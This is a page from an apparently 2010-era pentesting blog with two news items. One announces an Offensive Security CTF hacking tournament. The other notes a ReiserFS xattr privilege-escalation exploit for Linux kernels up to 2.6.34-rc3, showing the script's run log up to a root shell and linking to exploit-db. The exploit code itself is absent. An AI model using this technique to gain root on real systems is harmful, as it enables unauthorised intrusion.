Hello there! If you are new here, you might want to subscribe to the RSS feed , Follow us on twitter . You may also subscribe by email .


Share Follow pentesting101 on Twitter

Delivered by FeedBurner

[ NEWS ] : offensive-security-hacking-tournament

Got the itch to hack something but don’t want to spend time in prison? Do you wish there was a legal way you could hack some servers just for fun? Then we have a challenge for you. Offensive Security Training is initiating its first ever “Open Hacking Tournament” , and as you can imagine, we’re not going to play fair.
What do you have to do to win this challenge? Use the Internet, use your skills, call your friends, heck, ask your mama – whatever it takes for you to hack our lab machines.
You will race against the clock and against other “hackers” to be the first to compromise all our lab servers, in a CTF style, “sudden death” tournament.
On the Table: One FREE, PWB OR CTP online course with 30 days of labs for the single winner.
On the Clock: The contest will commence between the 8th and 9th of May, 2010.
Job to be Done: Hack the living heck out of our challenge servers, and submit your documentation.
How to Win: Hack us the fastest.

more informations :
http://www.information-security-training.com/news/offensive-security-hacking-tournament/

[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

Author: Jon Oberheide
Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''

http://www.exploit-db.com/exploits/12130
 
 

WARNING

The tools and informations on this site are provided for legal security research and testing purposes only.
You will be held responsible for your own actions.
have fun and good hunting .

FOLLOW US

Follow pentesting101 on Twitter

Subscribe

Delivered by FeedBurner